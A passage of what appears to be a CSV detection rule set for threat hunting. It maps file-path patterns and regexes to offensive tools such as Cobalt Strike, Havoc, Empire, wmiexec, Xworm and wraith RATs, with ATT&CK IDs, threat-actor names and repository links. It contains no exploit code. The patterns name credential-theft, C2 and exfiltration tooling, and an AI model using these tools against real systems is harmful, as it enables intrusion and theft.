Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*/winsos-poc.git*",".{0,1000}\/winsos\-poc\.git.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*/wireless.py*",".{0,1000}\/wireless\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/wiresocks.git*",".{0,1000}\/wiresocks\.git.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*/wmeye/*",".{0,1000}\/wmeye\/.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","331","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*/WMI Lateral Movement/*",".{0,1000}\/WMI\sLateral\sMovement\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*/wmi.dropper*",".{0,1000}\/wmi\.dropper.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/WMI/wmi.py*",".{0,1000}\/WMI\/wmi\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/wmi_exec.exe*",".{0,1000}\/wmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/wmiexec.py*",".{0,1000}\/wmiexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/wmiexec/*",".{0,1000}\/wmiexec\/.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","157","25","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*/wmiexec2.git*",".{0,1000}\/wmiexec2\.git.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*/wmiexec-Pro*",".{0,1000}\/wmiexec\-Pro.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*/wmiexec-Pro.git*",".{0,1000}\/wmiexec\-Pro\.git.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*/WMIPersistence.git*",".{0,1000}\/WMIPersistence\.git.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","2","112","29","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z" "*/WMIReg.exe*",".{0,1000}\/WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/wmisploit*",".{0,1000}\/wmisploit.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*/word_list.c",".{0,1000}\/word_list\.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/word_list.h",".{0,1000}\/word_list\.h","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/wordlists/owa_directories.txt*",".{0,1000}\/wordlists\/owa_directories\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*/wordlists/skype-directories.txt*",".{0,1000}\/wordlists\/skype\-directories\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*/wordlists/top_10000.txt*",".{0,1000}\/wordlists\/top_10000\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/wordlists/top_100000.txt*",".{0,1000}\/wordlists\/top_100000\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/workflow/test/dirbscan.yaml*",".{0,1000}\/workflow\/test\/dirbscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/Worm.dll*",".{0,1000}\/Worm\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - 
Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/wpaf/finder.py*",".{0,1000}\/wpaf\/finder\.py.{0,1000}","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","67","14","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" "*/wpscan.py*",".{0,1000}\/wpscan\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/wraith.git*",".{0,1000}\/wraith\.git.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith.py*",".{0,1000}\/wraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith-master.zip*",".{0,1000}\/wraith\-master\.zip.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - 
TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith-RAT-payloads*",".{0,1000}\/wraith\-RAT\-payloads.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith-RAT-payloads.git*",".{0,1000}\/wraith\-RAT\-payloads\.git.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith-server.py*",".{0,1000}\/wraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith-server_v*.py*",".{0,1000}\/wraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wsdd-discover.nse*",".{0,1000}\/wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ws-dirs.txt*",".{0,1000}\/ws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/ws-files.txt*",".{0,1000}\/ws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/WSPCoerce.git*",".{0,1000}\/WSPCoerce\.git.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*/wstunnel wstunnel*",".{0,1000}\/wstunnel\swstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data 
Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/wstunnel.exe",".{0,1000}\/wstunnel\.exe","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/wstunnel.git*",".{0,1000}\/wstunnel\.git.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/wstunnel/certs/*",".{0,1000}\/wstunnel\/certs\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/wstunnel:latest*",".{0,1000}\/wstunnel\:latest.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/wwlib/lolbins/*",".{0,1000}\/wwlib\/lolbins\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 
- T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*/www/exploit.html*",".{0,1000}\/www\/exploit\.html.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","392","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" "*/x0rz/*",".{0,1000}\/x0rz\/.{0,1000}","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/x0rz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/x11-access.nse*",".{0,1000}\/x11\-access\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/x64/Stardust.asm*",".{0,1000}\/x64\/Stardust\.asm.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*/x64_slim.dll*",".{0,1000}\/x64_slim\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/xan7r/kerberoast*",".{0,1000}\/xan7r\/kerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*/xar-1.5.2.tar.gz*",".{0,1000}\/xar\-1\.5\.2\.tar\.gz.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/xdmcp-discover.nse*",".{0,1000}\/xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xen-mimi.ps1*",".{0,1000}\/xen\-mimi\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/xeno-rat.git*",".{0,1000}\/xeno\-rat\.git.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*/XHVNC.exe*",".{0,1000}\/XHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/xml_attack.txt*",".{0,1000}\/xml_attack\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast 